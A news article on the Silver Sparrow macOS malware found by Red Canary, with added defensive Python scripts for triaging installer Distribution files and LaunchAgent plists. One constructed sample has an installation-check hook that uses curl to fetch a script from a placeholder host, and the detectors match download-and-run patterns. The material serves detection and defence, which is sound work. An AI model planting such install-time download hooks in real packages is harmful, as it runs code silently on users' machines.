Malware monsters target Apple’s M1 chip with ‘Silver Sparrow’

US security consultancy Red Canary says it has found macOS malware written specifically for the shiny new M1 chip that Apple created to power its post-Intel Macs.

Red Canary has named the malware “Silver Sparrow” and says it had found its way onto almost 30,000 macOS devices as of February 17th.

Red Canary’s post says it has analyzed two samples of the malware, one built for Intel x86 Macs only and the other built for both x86 and Apple’s own M1 silicon. The firm says both samples “leverage the macOS Installer JavaScript API to execute suspicious commands.” That’s not unusual behavior for a legitimate software installer package, but Red Canary says it has not seen malware use it before.
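Installer packages carry that JavaScript in a Distribution XML file, which you can pull out of any .pkg with `pkgutil --expand some.pkg outdir` and read at `outdir/Distribution`. The script below is an added example for triaging such files; it is not Red Canary’s tooling and the two Distribution files in it are constructed to show the pattern, not Silver Sparrow’s actual script. It flags `<script>` blocks that call `system.run` or `system.runOnce` (the documented calls in Apple’s Installer JavaScript API that launch an external program) and reports which installer hook, such as `installation-check`, would trigger them while the installer window is still open.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample Distribution file (what pkgutil --expand leaves at
# <outdir>/Distribution). The JavaScript is an illustration of the pattern,
# not Silver Sparrow's actual script; the URL is a reserved .invalid name.
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="2">
    <title>Example Updater</title>
    <options customize="never" allow-external-scripts="no"/>
    <installation-check script="installationCheck()"/>
    <script><![CDATA[
    function installationCheck() {
        // Executes as soon as the installer evaluates the check, before any
        // payload has been written to disk.
        system.run("/bin/sh", "-c", "curl -s https://example.invalid/agent.sh -o /tmp/agent.sh");
        return true;
    }
    ]]></script>
    <choices-outline>
        <line choice="default"/>
    </choices-outline>
    <choice id="default" title="Example Updater"/>
</installer-gui-script>
"""

# The same skeleton with a check that only inspects the OS version, which is
# what a legitimate installation-check usually looks like.
BENIGN_DISTRIBUTION = """<installer-gui-script minSpecVersion="2">
    <title>Example Updater</title>
    <installation-check script="installationCheck()"/>
    <script><![CDATA[
    function installationCheck() {
        if (system.compareVersions(system.version.ProductVersion, "11.0") < 0) {
            my.result.title = "Unsupported macOS";
            my.result.type = "Fatal";
            return false;
        }
        return true;
    }
    ]]></script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default" title="Example Updater"/>
</installer-gui-script>
"""

# Hooks whose "script" attribute names a JavaScript function the installer runs.
HOOK_TAGS = ("installation-check", "volume-check")
# Installer JS calls that hand control to an external program.
RISKY_CALLS = ("system.run(", "system.runOnce(")


def find_script_execution(distribution_xml: str) -> list:
    """Return one finding per <script> block that calls system.run/runOnce.

    Each finding lists the risky calls, the hooks (installation-check,
    volume-check) whose handler is defined in that block, and the raw
    argument list of every risky call so an analyst sees what would run.
    """
    root = ET.fromstring(distribution_xml.encode("utf-8"))
    hooks = {tag: root.find(tag).get("script", "")
             for tag in HOOK_TAGS if root.find(tag) is not None}
    findings = []
    for script in root.iter("script"):
        body = script.text or ""          # CDATA content comes through as text
        calls = [c for c in RISKY_CALLS if c in body]
        if not calls:
            continue
        defined = set(re.findall(r"function\s+(\w+)\s*\(", body))
        hook_names = [tag for tag, expr in hooks.items()
                      if expr.split("(")[0].strip() in defined]
        args = re.findall(r"system\.run(?:Once)?\(([^)]*)\)", body)
        findings.append({"calls": calls, "hooks": hook_names,
                         "args": [a.strip() for a in args]})
    return findings


if __name__ == "__main__":
    # Usage: python triage_distribution.py outdir/Distribution
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_DISTRIBUTION
    for finding in find_script_execution(text):
        print(finding)
```

A hit on `installation-check` is the one to look at first: that hook fires when the package is merely opened, so the command runs even if the user never clicks Install. Attribute-level JavaScript elsewhere in the file (for example `selected` expressions on `<choice>` elements) is not scanned here.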

Once the scripts run, a Mac will have two new and nasty files, one of which phones home to the malware’s authors to report that it was installed.

The other script is driven by a persistent LaunchAgent that runs it hourly to contact a server and ask whoever controls the malware for further instructions.

Red Canary says that hourly request “tells launchd to execute a shell script that downloads a JSON file to disk, converts it into a plist, and uses its properties to determine further actions.”
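The practical question for a defender is how to spot an agent like that across a fleet. The triage script below is an added example, not Red Canary’s tooling; the two LaunchAgent plists in it are constructed to show the pattern and are not Silver Sparrow’s artifacts. It assumes the hourly cadence is expressed as `StartInterval` of 3600 seconds (a `StartCalendarInterval` schedule would need a separate check) and scores each agent on the combination the article describes: a shell interpreter as the program, a script in a user-writable location, a short polling interval, and `RunAtLoad`. On a real Mac the files to feed it live in `~/Library/LaunchAgents` and `/Library/LaunchAgents`.

```python
import plistlib
from pathlib import Path

# Program values that mean "run a script", not a signed application binary.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
# Locations an unprivileged user (or malware running as that user) can write to.
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/")
SCRIPT_SUFFIXES = (".sh", ".command", ".py")
ONE_HOUR = 3600

# Constructed plist: hidden script under the user's Library, run by /bin/sh
# every hour and again at every login. Not Silver Sparrow's real plist.
SUSPICIOUS_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>example.updater</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>-c</string>
        <string>/Users/alice/Library/.update/agent.sh</string>
    </array>
    <key>StartInterval</key><integer>3600</integer>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed plist for a legitimate-looking daily checker inside an app bundle.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.helper</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Example.app/Contents/MacOS/helper</string>
        <string>--check</string>
    </array>
    <key>StartInterval</key><integer>86400</integer>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def triage_launch_agent(plist_bytes: bytes) -> dict:
    """Score one LaunchAgent plist and explain every point it scored."""
    agent = plistlib.loads(plist_bytes)
    args = list(agent.get("ProgramArguments", []))
    program = agent.get("Program") or (args[0] if args else "")
    reasons = []
    if program in SHELLS:
        reasons.append(f"{program} as program: runs a shell, not a signed binary")
    for arg in args[1:]:
        if arg.startswith(USER_WRITABLE) and arg.endswith(SCRIPT_SUFFIXES):
            reasons.append(f"executes script from user-writable path {arg}")
        if "curl " in arg or "| sh" in arg:
            reasons.append(f"inline download-and-run command: {arg}")
    interval = agent.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= ONE_HOUR:
        reasons.append(f"StartInterval {interval}s: polls at least hourly")
    if agent.get("RunAtLoad") is True:
        reasons.append("RunAtLoad: relaunches at every login")
    # Two independent indicators is the (tunable) threshold for escalation.
    return {"label": agent.get("Label"), "program": program,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def scan_launch_agents(*directories) -> list:
    """Run triage over every *.plist in the given directories."""
    results = []
    for directory in directories:
        for path in Path(directory).glob("*.plist"):
            try:
                result = triage_launch_agent(path.read_bytes())
            except Exception as exc:  # binary or malformed plist: still report it
                result = {"label": None, "program": None,
                          "reasons": [f"unparseable: {exc}"], "suspicious": False}
            result["path"] = str(path)
            results.append(result)
    return results


if __name__ == "__main__":
    home = Path.home()
    for r in scan_launch_agents(home / "Library/LaunchAgents", "/Library/LaunchAgents"):
        if r["suspicious"]:
            print(r["path"], r["reasons"])
```

The benign agent scores one point (RunAtLoad) and stays below the threshold, while the constructed hourly shell-script agent scores four; tune `ONE_HOUR` and the threshold to your fleet, and treat an unparseable plist as worth a manual look rather than silently skipping it.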

The firm’s researchers ran the malware for a week and never saw that request result in a download, leading them to suggest the malware currently lacks a payload.

How the malware is distributed remains a mystery, but Red Canary’s researchers have divined that its infrastructure sits in AWS and on Akamai’s content delivery network. The firm suggests Silver Sparrow’s authors therefore have a decent understanding of how hosting in a public cloud and CDN makes malware harder to block, because organizations often have very good reasons to allow traffic to and from large public clouds.

Read more at The Register